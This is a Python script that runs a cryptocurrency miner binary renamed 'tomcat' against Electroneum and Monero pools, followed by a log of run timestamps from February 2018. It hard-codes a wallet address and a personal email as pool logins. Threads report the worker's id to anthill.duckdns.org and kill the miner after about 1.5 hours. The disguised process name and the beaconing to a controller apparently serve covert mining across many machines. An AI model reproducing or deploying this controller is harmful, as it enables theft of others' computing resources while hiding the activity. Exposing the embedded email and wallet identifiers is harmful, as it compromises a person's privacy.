import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:01.355977
#2018-02-17 15:56:07.565002
#2018-02-17 17:44:05.406435
#2018-02-17 19:32:04.890613
#2018-02-17 21:22:01.283878
#2018-02-17 23:06:01.972949
#2018-02-18 00:53:03.688856
#2018-02-18 02:40:08.446501
#2018-02-18 04:28:01.772820
#2018-02-18 06:19:03.439498
#2018-02-18 08:09:05.451589
#2018-02-18 09:56:07.186509
#2018-02-18 11:43:07.465079
#2018-02-18 13:28:01.494613
#2018-02-18 15:17:07.425960
#2018-02-18 17:06:04.023656
#2018-02-18 18:53:07.490305
#2018-02-18 20:41:06.013076
#2018-02-18 22:26:05.671425
#2018-02-19 00:15:01.441915
#2018-02-19 02:01:03.968422
#2018-02-19 03:48:08.507328
#2018-02-19 05:33:01.886257
#2018-02-19 07:21:07.003360
#2018-02-19 09:11:05.752469
#2018-02-19 11:01:01.852328
#2018-02-19 12:49:01.958855
#2018-02-19 14:37:06.987339
#2018-02-19 16:26:04.500869
#2018-02-19 18:12:04.837146
#2018-02-19 20:00:08.842542
#2018-02-19 21:49:04.212588
#2018-02-19 23:34:04.607774
#2018-02-20 01:19:03.873779
#2018-02-20 03:08:04.125134
#2018-02-20 04:54:07.506396
#2018-02-20 06:37:06.865195
#2018-02-20 08:22:06.236421
#2018-02-20 10:08:03.558103
#2018-02-20 11:52:04.253010
#2018-02-20 13:41:06.499639
#2018-02-20 15:24:05.120055
#2018-02-20 17:09:04.154182
#2018-02-20 18:57:04.594613
#2018-02-20 20:47:07.008680
#2018-02-20 22:30:01.744683
#2018-02-21 00:11:03.876657
#2018-02-21 01:56:03.995288
#2018-02-21 03:44:07.419828
#2018-02-21 05:31:05.639187
#2018-02-21 07:20:04.092998
#2018-02-21 09:05:06.403292
#2018-02-21 10:53:07.850717
#2018-02-21 12:40:10.743876
#2018-02-21 14:28:04.314446
#2018-02-21 16:16:09.612195
#2018-02-21 18:06:01.402011
#2018-02-21 19:52:06.189600
#2018-02-21 21:42:08.834739
#2018-02-21 23:28:06.878450
#2018-02-22 01:17:07.344465
#2018-02-22 03:07:04.465602
#2018-02-22 04:52:07.145781
#2018-02-22 06:37:07.489199
#2018-02-22 08:25:04.794848
#2018-02-22 08:26:01.962082
#2018-02-22 10:12:01.889060
#2018-02-22 11:42:09.002169
#2018-02-22 13:18:08.973704
#2018-02-22 14:54:04.128218
#2018-02-22 16:25:01.657257
#2018-02-22 17:58:12.087491
#2018-02-22 19:34:07.203467
#2018-02-22 21:13:09.271971
#2018-02-22 22:41:09.149895
#2018-02-23 00:16:07.076350
#2018-02-23 01:53:05.666505
#2018-02-23 03:24:06.957700
#2018-02-23 04:57:07.512310
#2018-02-23 06:31:07.627975
#2018-02-23 08:13:04.830163
#2018-02-23 10:15:02.151527
#2018-02-23 11:40:09.924605
#2018-02-23 13:03:06.930511
#2018-02-23 14:26:08.520267
#2018-02-23 16:05:06.475565
#2018-02-23 17:35:04.357603
#2018-02-23 19:10:03.900209
#2018-02-23 20:44:04.043191
#2018-02-23 22:17:07.769098
#2018-02-23 23:52:02.086719
#2018-02-24 01:26:04.475266
#2018-02-24 03:02:04.827981
#2018-02-24 04:37:05.069044
#2018-02-24 06:09:04.327969
#2018-02-24 07:43:01.656889
#2018-02-24 09:16:06.294307
#2018-02-24 11:02:04.771903
#2018-02-24 12:35:01.474817
#2018-02-24 14:11:06.524064
#2018-02-24 15:36:05.024862
#2018-02-24 17:17:02.197682
#2018-02-24 18:48:01.466566
#2018-02-24 20:20:04.309264
#2018-02-24 21:49:01.916967
#2018-02-25 01:42:04.124748
#2018-02-25 05:23:06.042545
#2018-02-25 11:34:05.428544